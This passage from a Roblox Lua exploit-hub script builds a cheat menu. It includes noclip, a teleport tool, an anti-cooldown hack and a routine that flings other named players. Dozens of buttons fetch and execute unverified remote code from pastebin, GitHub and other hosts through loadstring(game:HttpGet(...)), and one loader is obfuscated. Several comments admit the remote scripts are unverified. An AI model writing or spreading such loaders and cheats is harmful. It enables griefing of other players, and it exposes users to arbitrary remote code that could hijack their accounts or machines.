Instance.new("Frame") local Title = Instance.new("TextLabel") local Toggle = Instance.new("TextButton") local StatusPF = Instance.new("TextLabel") local Status = Instance.new("TextLabel") local Credit = Instance.new("TextLabel") local CloseButton = Instance.new("TextButton") local ClipOn = false local NoclipConnection Noclip.Name = "Noclip" Noclip.Parent = CoreGui BG.Name = "BG" BG.Parent = Noclip BG.BackgroundColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392) BG.BorderColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235) BG.BorderSizePixel = 2 BG.Position = UDim2.new(0.5, -75, 0.5, -63) BG.Size = UDim2.new(0, 150, 0, 127) BG.Active = true BG.Draggable = true Title.Name = "Title" Title.Parent = BG Title.BackgroundColor3 = Color3.new(0.266667, 0.00392157, 0.627451) Title.BorderColor3 = Color3.new(0.180392, 0, 0.431373) Title.BorderSizePixel = 2 Title.Size = UDim2.new(0, 150, 0, 33) Title.Font = Enum.Font.Highway Title.Text = "Noclip" Title.TextColor3 = Color3.new(1, 1, 1) Title.FontSize = Enum.FontSize.Size24 Title.TextSize = 24 Title.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373) Title.TextStrokeTransparency = 0 Toggle.Parent = BG Toggle.BackgroundColor3 = Color3.new(0.266667, 0.00392157, 0.627451) Toggle.BorderColor3 = Color3.new(0.180392, 0, 0.431373) Toggle.BorderSizePixel = 2 Toggle.Position = UDim2.new(0.5, -73, 0.7, -43) Toggle.Size = UDim2.new(0, 146, 0, 36) Toggle.Font = Enum.Font.Highway Toggle.FontSize = Enum.FontSize.Size18 Toggle.Text = "Toggle" Toggle.TextColor3 = Color3.new(1, 1, 1) Toggle.TextSize = 18 Toggle.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373) Toggle.TextStrokeTransparency = 0 StatusPF.Name = "StatusPF" StatusPF.Parent = BG StatusPF.BackgroundColor3 = Color3.new(1, 1, 1) StatusPF.BackgroundTransparency = 1 StatusPF.Position = UDim2.new(0.5, -43, 0.88, -23) StatusPF.Size = UDim2.new(0, 56, 0, 20) StatusPF.Font = Enum.Font.Highway StatusPF.FontSize = Enum.FontSize.Size18 StatusPF.Text = "Status:" StatusPF.TextColor3 = Color3.new(1, 1, 1) StatusPF.TextSize = 18 StatusPF.TextStrokeColor3 = Color3.new(0.333333, 0.333333, 0.333333) StatusPF.TextStrokeTransparency = 0 StatusPF.TextWrapped = true Status.Name = "Status" Status.Parent = BG Status.BackgroundColor3 = Color3.new(1, 1, 1) Status.BackgroundTransparency = 1 Status.Position = UDim2.new(0.5, -4, 0.88, -22) Status.Size = UDim2.new(0, 50, 0, 20) Status.Font = Enum.Font.Highway Status.FontSize = Enum.FontSize.Size18 Status.Text = "Off" Status.TextColor3 = Color3.new(1, 0, 0) Status.TextWrapped = true Credit.Name = "Credit" Credit.Parent = BG Credit.BackgroundColor3 = Color3.new(1, 1, 1) Credit.BackgroundTransparency = 1 Credit.Position = UDim2.new(0.5, -64, 0.93, -10) Credit.Size = UDim2.new(0, 128, 0, 17) Credit.Font = Enum.Font.SourceSans Credit.FontSize = Enum.FontSize.Size14 Credit.Text = "Created by alexis.isback00" Credit.TextColor3 = Color3.new(1, 1, 1) Credit.TextSize = 14 Credit.TextStrokeColor3 = Color3.new(0.196078, 0.196078, 0.196078) Credit.TextStrokeTransparency = 0 Credit.TextWrapped = true CloseButton.Name = "CloseButton" CloseButton.Parent = BG CloseButton.BackgroundColor3 = Color3.new(0.266667, 0.00392157, 0.627451) CloseButton.BorderColor3 = Color3.new(0.180392, 0, 0.431373) CloseButton.BorderSizePixel = 2 CloseButton.Position = UDim2.new(0.9, -15, 0.02, 0) CloseButton.Size = UDim2.new(0, 30, 0, 30) CloseButton.Font = Enum.Font.Highway CloseButton.FontSize = Enum.FontSize.Size18 CloseButton.Text = "X" CloseButton.TextColor3 = Color3.new(1, 1, 1) CloseButton.TextSize = 18 CloseButton.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373) CloseButton.TextStrokeTransparency = 0 CloseButton.MouseButton1Click:Connect(CloseGui) local function ToggleNoclip(enabled) for _, player in pairs(Players:GetPlayers()) do local character = player.Character if character then for _, part in pairs(character:GetDescendants()) do if part:IsA("BasePart") then part.CanCollide = not enabled end end end end ClipOn = enabled end local function UpdateToggleVisual() Toggle.Text = ClipOn and "On" or "Off" local color = ClipOn and Color3.new(0, 1, 0) or Color3.new(1, 0, 0) local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quart, Enum.EasingDirection.Out) local tweenGoal = { TextStrokeColor3 = color, TextColor3 = color } local toggleTween = TweenService:Create(Toggle, tweenInfo, tweenGoal) toggleTween:Play() end local function ActivateNoclip() ToggleNoclip(not ClipOn) Status.Text = ClipOn and "On" or "Off" Status.TextColor3 = ClipOn and Color3.new(0, 1, 0) or Color3.new(1, 0, 0) UpdateToggleVisual() end Toggle.MouseButton1Click:Connect(ActivateNoclip) CloseButton.MouseButton1Click:Connect(function() Noclip:Destroy() end) local function DraggingFunction(input) return UDim2.new(0, input.Position.X - Offset.X, 0, input.Position.Y - Offset.Y) end BG.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 then Offset = input.Position - BG.Position BG.CaptureFocus = true end end) BG.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then BG.Position = DraggingFunction(input) end end) BG.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 then BG.CaptureFocus = false end end) RunService.Heartbeat:Connect(function() if ClipOn then for _, player in pairs(Players:GetPlayers()) do local character = player.Character if character then for _, part in pairs(character:GetDescendants()) do if part:IsA("BasePart") then part.CanCollide = false end end end end end end) end) Section:NewButton("Car Fly Buttons", "car fly", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://pastebin.com/raw/GRp9rP98"))() end) Section:NewButton("Fling Gui", "op flings", function() -- player fling gui local Players = game:GetService("Players") local Player = Players.LocalPlayer local ScreenGui = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local TextBox = Instance.new("TextBox") local TextButton = Instance.new("TextButton") ScreenGui.Parent = Player:WaitForChild("PlayerGui") ScreenGui.ResetOnSpawn = false Frame.Parent = ScreenGui Frame.BackgroundColor3 = Color3.fromRGB(33, 33, 33) Frame.Position = UDim2.new(0.5, -100, 0.5, -50) Frame.Size = UDim2.new(0, 200, 0, 100) Frame.Active = true Frame.Draggable = true TextBox.Parent = Frame TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox.Position = UDim2.new(0.1, 0, 0.2, 0) TextBox.Size = UDim2.new(0.8, 0, 0.2, 0) TextBox.Font = Enum.Font.SourceSans TextBox.PlaceholderText = "Enter username" TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextSize = 14 TextButton.Parent = Frame TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0) TextButton.Position = UDim2.new(0.1, 0, 0.5, 0) TextButton.Size = UDim2.new(0.8, 0, 0.4, 0) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "FLING!" TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextSize = 20 local function GetPlayer(Name) Name = Name:lower() for _, x in next, Players:GetPlayers() do if x ~= Player then if x.Name:lower():match("^" .. Name) or x.DisplayName:lower():match("^" .. Name) then return x end end end return nil end local function Message(_Title, _Text, Time) game:GetService("StarterGui"):SetCore("SendNotification", {Title = _Title, Text = _Text, Duration = Time}) end local function SkidFling(TargetPlayer) local Character = Player.Character local Humanoid = Character and Character:FindFirstChildOfClass("Humanoid") local RootPart = Humanoid and Humanoid.RootPart local TCharacter = TargetPlayer.Character local THumanoid = TCharacter and TCharacter:FindFirstChildOfClass("Humanoid") local TRootPart = THumanoid and THumanoid.RootPart local THead = TCharacter and TCharacter:FindFirstChild("Head") local Accessory = TCharacter and TCharacter:FindFirstChildOfClass("Accessory") local Handle = Accessory and Accessory:FindFirstChild("Handle") if Character and Humanoid and RootPart then if RootPart.Velocity.Magnitude < 50 then getgenv().OldPos = RootPart.CFrame end if THumanoid and THumanoid.Sit then return Message("Error Occurred", "Target is sitting", 5) end if THead then workspace.CurrentCamera.CameraSubject = THead elseif Handle then workspace.CurrentCamera.CameraSubject = Handle else workspace.CurrentCamera.CameraSubject = THumanoid end if not TCharacter:FindFirstChildWhichIsA("BasePart") then return end local function FPos(BasePart, Pos, Ang) RootPart.CFrame = CFrame.new(BasePart.Position) * Pos * Ang Character:SetPrimaryPartCFrame(CFrame.new(BasePart.Position) * Pos * Ang) RootPart.Velocity = Vector3.new(9e7, 9e7 * 10, 9e7) RootPart.RotVelocity = Vector3.new(9e8, 9e8, 9e8) end local function SFBasePart(BasePart) local TimeToWait = 2 local Time = tick() local Angle = 0 repeat if RootPart and THumanoid then if BasePart.Velocity.Magnitude < 50 then Angle = Angle + 100 FPos(BasePart, CFrame.new(0, 1.5, 0) + THumanoid.MoveDirection * BasePart.Velocity.Magnitude / 1.25, CFrame.Angles(math.rad(Angle),0 ,0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, 0) + THumanoid.MoveDirection * BasePart.Velocity.Magnitude / 1.25, CFrame.Angles(math.rad(Angle), 0, 0)) task.wait() FPos(BasePart, CFrame.new(2.25, 1.5, -2.25) + THumanoid.MoveDirection * BasePart.Velocity.Magnitude / 1.25, CFrame.Angles(math.rad(Angle), 0, 0)) task.wait() FPos(BasePart, CFrame.new(-2.25, -1.5, 2.25) + THumanoid.MoveDirection * BasePart.Velocity.Magnitude / 1.25, CFrame.Angles(math.rad(Angle), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, 1.5, 0) + THumanoid.MoveDirection,CFrame.Angles(math.rad(Angle), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, 0) + THumanoid.MoveDirection,CFrame.Angles(math.rad(Angle), 0, 0)) task.wait() else FPos(BasePart, CFrame.new(0, 1.5, THumanoid.WalkSpeed), CFrame.Angles(math.rad(90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, -THumanoid.WalkSpeed), CFrame.Angles(0, 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, 1.5, THumanoid.WalkSpeed), CFrame.Angles(math.rad(90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, 1.5, TRootPart.Velocity.Magnitude / 1.25), CFrame.Angles(math.rad(90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, -TRootPart.Velocity.Magnitude / 1.25), CFrame.Angles(0, 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, 1.5, TRootPart.Velocity.Magnitude / 1.25), CFrame.Angles(math.rad(90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, 0), CFrame.Angles(math.rad(90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, 0), CFrame.Angles(0, 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5 ,0), CFrame.Angles(math.rad(-90), 0, 0)) task.wait() FPos(BasePart, CFrame.new(0, -1.5, 0), CFrame.Angles(0, 0, 0)) task.wait() end else break end until BasePart.Velocity.Magnitude > 500 or BasePart.Parent ~= TargetPlayer.Character or TargetPlayer.Parent ~= Players or not TargetPlayer.Character == TCharacter or THumanoid.Sit or Humanoid.Health <= 0 or tick() > Time + TimeToWait end workspace.FallenPartsDestroyHeight = 0/0 local BV = Instance.new("BodyVelocity") BV.Name = "EpixVel" BV.Parent = RootPart BV.Velocity = Vector3.new(9e8, 9e8, 9e8) BV.MaxForce = Vector3.new(1/0, 1/0, 1/0) Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated, false) if TRootPart and THead then if (TRootPart.CFrame.p - THead.CFrame.p).Magnitude > 5 then SFBasePart(THead) else SFBasePart(TRootPart) end elseif TRootPart and not THead then SFBasePart(TRootPart) elseif not TRootPart and THead then SFBasePart(THead) elseif not TRootPart and not THead and Accessory and Handle then SFBasePart(Handle) else return Message("Error Occurred", "Target is missing everything", 5) end BV:Destroy() Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated, true) workspace.CurrentCamera.CameraSubject = Humanoid repeat RootPart.CFrame = getgenv().OldPos * CFrame.new(0, .5, 0) Character:SetPrimaryPartCFrame(getgenv().OldPos * CFrame.new(0, .5, 0)) Humanoid:ChangeState("GettingUp") table.foreach(Character:GetChildren(), function(_, x) if x:IsA("BasePart") then x.Velocity, x.RotVelocity = Vector3.new(), Vector3.new() end end) task.wait() until (RootPart.Position - getgenv().OldPos.p).Magnitude < 25 workspace.FallenPartsDestroyHeight = getgenv().FPDH else return Message("Error Occurred", "Random error", 5) end end TextButton.MouseButton1Click:Connect(function() local targetName = TextBox.Text local targetPlayer = GetPlayer(targetName) if targetPlayer then SkidFling(targetPlayer) else Message("Error Occurred", "Invalid username", 5) end end) end) Section:NewButton("Tp Tool", "tp anywhere", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] mouse = game.Players.LocalPlayer:GetMouse() tool = Instance.new("Tool") tool.RequiresHandle = false tool.Name = "Tp tool(Equip to Click TP)" tool.Activated:connect(function() local pos = mouse.Hit+Vector3.new(0,2.5,0) pos = CFrame.new(pos.X,pos.Y,pos.Z) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos end) tool.Parent = game.Players.LocalPlayer.Backpack end) Section:NewButton("Shitflock (best)", "ButtonInfo", function() loadstring(game:HttpGet('https://pastebin.com/raw/CjNsnSDy'))() end) local Tab = Window:NewTab("🎮 Game Scripts") local Section = Tab:NewSection("Blox Fruits") Section:NewButton("Min Gaming", "opens min hub script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Min/refs/heads/main/MinMasEng"))() end) Section:NewButton("Auto Bounty", "bounty", function() Setup = { ['PC-er'] = false, ['Team'] = 'Pirates', ['Auto Team'] = { ['Enabled'] = false, ['Lock'] = { ['Pirate'] = {0, 30000000}, ['Marines'] = {0, 30000000} } }, ['Panic % Health'] = {35, 55}, ['Chatting'] = {}, ['Lock Cam'] = false, ['Hop Region'] = 'Singapore', ['Random Y Tween'] = false, ['Click Delay'] = 0.2 } Hunter = { ['Ignore'] = { ['Fruit'] = { 'Meme-Meme' }, ['Timer'] = 72, ['V4'] = false }, ['Gun Mode'] = false, ['Predict Move'] = true, ['Hit And Run'] = true, ['Random Position'] = false } Booster = { ['Hide Gui'] = false, ['Showcase Mode'] = false, ['White Screen'] = false, ['Hide Map'] = false } Skills = { ['Melee'] = { ['Enabled'] = {true, true}, ['Z'] = {true, 0.1, 0.165}, ['X'] = {true, 0.3, 0.246}, ['C'] = {true, 0.5, 0.125} }, ['Blox Fruit'] = { ['Enabled'] = {false, false}, ['Z'] = {true, 1.325, 0.9}, ['X'] = {true, 0.6, 0.235}, ['C'] = {true, 0.2, 0.435}, ['V'] = {true, 0.3, 0.195}, ['F'] = {true, 0, 0.6} }, ['Sword'] = { ['Enabled'] = {true, true}, ['Z'] = {true, 0.5, 0.2}, ['X'] = {true, 0.3, 0.4}, }, ['Gun'] = { ['Enabled'] = {false, false}, ['Z'] = {false, 0, 0}, ['X'] = {false, 0, 0}, } } Macro = { ['Enabled'] = true, ['Skills'] = { [1] = {'Melee', {'C', 'Z'}}, [2] = {'Blox Fruit', {'F','C'}}, [3] = {'Sword', {'X', 'Z'}}, [4] = {'Melee', {'X'}}, [5] = {'Gun', {'Z', 'V'}}, [6] = {'Blox Fruit', {'Z', 'F'}} } } Counter = { ['Enabled'] = true, ['Webhook'] = { ['Enabled'] = false, ['Url'] = '' }, ['Theme'] = { ['Character'] = 'Yae', ['Custom'] = { ['Enabled'] = false, ['Config'] = { ['Background'] = '', ['Character'] = '', ['Icon'] = '', ['Button Image'] = '', ['Color'] = { ['Text'] = Color3.fromRGB(255, 255, 255), ['Stroke'] = Color3.fromRGB(255, 255, 255) } } } }, } loadstring(game:HttpGet('https://raw.githubusercontent.com/ErutTheTeru/ruahub/refs/heads/main/bounty-hunter.lua'))() end) Section:NewButton("Attack Hub", "opens blox fruits script", function() _G.Team = "Pirate" --Pirate or Marine loadstring(game:HttpGet("https://raw.githubusercontent.com/KOBENFF/sdfd/refs/heads/main/Koatta.txt"))() end) Section:NewButton("Speed X Hun", "blox fruits", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))() end) Section:NewButton("Xeter Hub", "opens blox fruits", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Loader/main/Xeter.lua"))() end) Section:NewButton("Mashii Hub", "opens mashii hub script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Flontium2/Mashii-Hub/refs/heads/main/Main.lua"))() end) Section:NewButton("Crescent Moon Hub", "opens blox fruits script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Xyzzz1Project/ScriptProject-Anti-Tamper/main/CrescentMoonAntiTamperV2"))() end) Section:NewButton("Rise Hub", "opens blox fruits", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/TrashLua/BloxFruits/main/FreeScripts.lua"))() end) Section:NewLabel("Murder Mystery 2") Section:NewButton("Auto Candy Farm", "farm candys hallowen", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/vexroxd/My-Script-/refs/heads/main/MM2-Candy-Farm"))() end) Section:NewButton("Vertex Hub", "opens mm2 script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/s-o-a-b/nexus/main/loadstring"))() end) Section:NewButton("Yarhm Hub", "mm2 script cool", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Joystickplays/psychic-octo-invention/main/yarhm.lua", true))() end) Section:NewButton("Eclipse Hub", "mm2", function() local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https\58//api.eclipsehub.xyz/auth";c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)() end) Section:NewButton("Mars Hub", "OPENS MARS HUB", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/1andonlymars/MarsHub/main/MM2"))() end) Section:NewButton("Ski Hub", "opens ski hub", function() loadstring(game:HttpGet(("https://pastebin.com/raw/mT10xnt7"), true))() end) Section:NewLabel("Doors") Section:NewButton("MSPaint Hub", "mspaint script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/notpoiu/mspaint/main/main.lua"))() end) Section:NewButton("BlackKing Hub", "opens blackking", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/KINGHUB01/BlackKing-obf/main/Doors%20Blackking%20And%20BobHub"))() end) Section:NewLabel("Funky Friday") Section:NewButton("Auto Play V2", "v2", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/Nadir3709/RandomScript/main/FunkyFridayMobile"))() end) Section:NewButton("Null Fire", "nullfire script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/InfernusScripts/Fire-Hub/main/Loader"))() end) Section:NewButton("Fsploits", "opens script", function() loadstring(game:HttpGet("https://pastebin.com/raw/8RjuztBu"))() end) local Section = Tab:NewSection("Murderers vs Sheriffs Duels") Section:NewButton("Tbao Hub", "opens tbao hub script", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubMurdervssheriff"))() end) Section:NewButton("Ruby Hub", "Opens ruby hub script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Deni210/murdersvssherrifsduels/main/rubyhub", true))() end) Section:NewButton("haha Hub", "HAHA HUB REAL 100%", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/b9natwo/iSPLOIT/main/Murderers%20VS%20Sheriffs%20Duels.lua"))() end) Section:NewButton("VX.HUB-Mvsd (made by same owner as this script)", "op", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://pastebin.com/raw/pt2rVp8h"))(); end) Section:NewLabel("Tower Of Hell") Section:NewButton("sc0ttferren", "tower up skibidi", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/sc0ttferren/robloxscripts/main/toh/sc0tt.lua'))() end) Section:NewButton("Sprin Hub", "opens sprin hub script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/dqvh/dqvh/main/SprinHub",true))() end) Section:NewButton("Proxima", "Opens tower of sigma script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/TrixAde/Proxima-Hub/main/Main.lua"))() end) Section:NewLabel("Pop It Trading") Section:NewButton("Uni Hub (pop it trading)", "good", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet('https://pastebin.com/raw/dcyuEgyK'))() end) Section:NewButton("idk hub (i dont know name)", "good script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Uhhh1230/Pop-It-Trading/main/E"))() end) Section:NewButton("Ishield Hub", "op", function() _G.credits = "Credits to iShield. DISCORD SERVER INVITE LINK: https://discord.gg/x57Xk65xZs" loadstring(game:HttpGet("https://raw.githubusercontent.com/iShield2005/scripts/master/shieldhubloader2"))() end) Section:NewButton("VX.HUB-Pop it Trading (maded by same owner as this)", "good", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://pastebin.com/raw/8zpEQ5fh"))(); end) Section:NewLabel("KAT!") Section:NewButton("Sinister Gui (op)", "op best", function() loadstring(Game:HttpGet("https://gist.githubusercontent.com/qp39rh421984y812/d59f1517d9ed447698dcdbf97bd91b02/raw/360823c8df903d52d2d089a90b3e6106191f8df8/Katmonke"))() end) Section:NewButton("Troll Gui", "trolls", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet('https://pastebin.com/raw/TDBuxW7W'))() end) Section:NewButton("Tbao Hub (KAT)", "good script tbh", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubKat"))() end) Section:NewLabel("Pets Go") Section:NewButton("Lumin Hub", "good", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://pastebin.com/raw/AwBthkvY"))() end) Section:NewButton("Speed X Hub", "epic", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))() end) Section:NewButton("Idk Hub (dont know name)", "toilet script", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/JixSo-48/CodeNest/refs/heads/main/Games/Pets-Go", true))() end) Section:NewButton("Ather Hub", "okay ig", function() --DISCORD please join: https://discord.gg/n86w8P8Evx loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/2529a5f9dfddd5523ca4e22f21cceffa.lua"))() end) Section:NewLabel("Brookhaven") Section:NewButton("Sander X Hub", "select free one", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/kigredns/SanderXV4.2.2/refs/heads/main/New.lua'))() end) Section:NewButton("Ghub", "GHUB PATCH", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/GHUBV14XZ/main/Ghub_Main_Loader.txt"))() end) Section:NewLabel("Bee Swarm") Section:NewButton("Verbal (sigma)", "verbal", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/VerbalHubz/Verbal-Hub/refs/heads/main/Bee%20Swarm%20Sim.Lua',true))() end) Section:NewButton("Kron Hub", "good", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/DevKron/Kron_Hub/refs/heads/main/version_1.0'))("") end) Section:NewButton("Macro V3", "op", function() loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/bc8c5c45c26f8e4cdb060277b0bbcab7.lua"))() end) Section:NewButton("Histy Hub", "cool", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/Histy"))() end) Section:NewButton("Speed X Hub (fisch)", "op", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))() end) Section:NewLabel("Blade Ball") Section:NewButton("Lunar Hub", "Epic Autoparry", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Akirascripts/Lunar/refs/heads/main/LuanrOnTop"))() end) Section:NewButton("Corolla", "blade ball", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/7190000/Corolla-Hub/main/ch.lua'))() end) Section:NewButton("GPLLP", "BLADE BALL", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/songolasangkatangw/memek/main/adakontolsamamemek.lua"))() end) Section:NewButton("Venox", "blade ball", function() loadstring(Game:HttpGet("https://raw.githubusercontent.com/Fsploit/venox-blade-ball-v1/main/K-A-T-S-U-S-F-S-P-L-O-I-T-I-S-A-F-U-R-R-Y%20MAIN%20V4"))() end) Section:NewButton("Neon.c Hub", "blade ball", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Neoncat765/Neon.C-Hub-X/main/UnknownVersion"))(); end) Section:NewButton("Grandmaster.Olo", "patch", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GrandmasterOfLife123/lua/main/releasedbladeball.lua"))() end) Section:NewButton("Triple", "blade ball", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/TripleScript/TripleHub/main/T-R-I-P-L-E-B-E-A-T-E-R-T-H-I-S-D-A-Y.txt"))() end) Section:NewButton("Micro", "blade ball", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Micro-Scripts/BladeBall/refs/heads/main/Main"))() end) Section:NewLabel("Fisch") Section:NewButton("Eternal Hub", "opens eternal hub", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Vixx77/Eternal/main/EternalHub_Fish'))() end) Section:NewButton("Rinns Hub", "e fisch", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/kylosilly/femboyware/refs/heads/main/Fisch.lua"))() end) Section:NewButton("XNOX Hub", "fisch", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/kidxnox/f/refs/heads/main/f"))() end) Section:NewLabel("Slap Battles") Section:NewButton("Kykyryz0B", "sb", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/KykyryzoB/KykyryzoB-Hub-SB/main/KykryzoB.lua"))() end) Section:NewButton("Giang Hub", "giang op", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Giangplay/Slap_Battles/main/Slap_Battles.lua"))() end) Section:NewButton("Anti Cooldown (u have to execute again if die)", "slap battles", function() local player = game.Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local tool = character:FindFirstChildOfClass("Tool") or player.Backpack:FindFirstChildOfClass("Tool") while character.Humanoid.Health ~= 0 do local localscript = tool:FindFirstChildOfClass("LocalScript") local localscriptclone = localscript:Clone() localscriptclone = localscript:Clone() localscriptclone:Clone() localscript:Destroy() localscriptclone.Parent = tool wait(0.1) end end) Section:NewLabel("Strongest Battle Grounds") Section:NewButton("Animations Gui (kj,gojo)", "strongest", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Mautiku/ehh/main/strong%20guest.lua.txt'))() end) Section:NewButton("Tam Hub", "battle", function() loadstring(game:HttpGet"https://raw.githubusercontent.com/tamarixr/tamhub/main/bettertamhub.lua")() end) Section:NewButton("Speed X Hub", "grounds", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))() end) Section:NewLabel("Arsenal") Section:NewButton("Owl Hub", "arsenal", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/CriShoux/OwlHub/master/OwlHub.txt"))(); end) Section:NewButton("Tbao Hub Op", "op", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubArsenal"))() end) Section:NewButton("VG Hub", "op", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub'))() end) Section:NewButton("Vapa (best)", "ButtonInfo", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nickyangtpe/Vapa-v2/refs/heads/main/Vapav2-Arsenal.lua", true))() end) Section:NewButton("CHEATER.FUN", "OP", function() loadstring(game:HttpGet("https://pastebin.com/raw/14xXHZQW"))() end) Section:NewButton("Leg Hub", "op", function() loadstring(game:HttpGet("https://pastebin.com/raw/G6Ubkkuv"))() end) Section:NewLabel("Rivals") Section:NewButton("Tbao Op", "rivals", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubRivals"))() end) Section:NewButton("Azure", "op", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Actyrn/Scripts/main/AzureModded"))() end) Section:NewButton("Minimal Hub", "op", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/MinimalScriptingService/MinimalRivals/main/rivals.lua",true))() end) Section:NewLabel("Bedwars") Section:NewButton("Vape V4", "ButtonInfo", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua", true))() end) local Tab = Window:NewTab("📜 Universal Scripts") local Section = Tab:NewSection("Dex") Section:NewButton("Dark Dex 